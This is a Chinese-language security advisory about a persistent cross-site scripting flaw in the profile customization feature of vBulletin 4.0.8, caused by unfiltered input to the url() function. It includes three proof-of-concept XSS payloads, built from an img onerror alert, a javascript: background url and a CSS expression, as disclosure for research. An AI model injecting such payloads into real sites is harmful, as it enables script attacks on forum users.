首页 -> 安全研究

安全研究

安全漏洞
vBulletin Profile Customization功能HTML注入漏洞

发布日期:2010-11-14
更新日期:2010-11-16

受影响系统:
VBulletin VBulletin 4.0.8
描述:
BUGTRAQ  ID: 44873

vBulletin是一款开放源代码的PHP论坛程序。

vBulletin的Profile Customization功能中存在持续性跨站脚本漏洞。在配置文件的自定义字段,可以输入颜色代码、rgb代码和图形。由于url()函数没有正确的过滤用户输入,导致vBulletin受跨站脚本攻击的影响。

<*来源:MaXe
  
  链接:http://forum.intern0t.net/intern0t-advisories/3349-vbulletin-4-0-8-persistent-cross-site-scripting-via-profile-customization.html
        http://secunia.com/advisories/42209/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

url(</script><img src="x:x" onerror="alert(String.fromCharCode(73,110,116,101, 114,78,48,84,11))" />)
url(/);background:url(javascript:document.write(1337))
url(/);width:expression(alert('www.intern0t.net'))

建议:
厂商补丁:

VBulletin
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.vbulletin.com/

浏览次数:3413
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障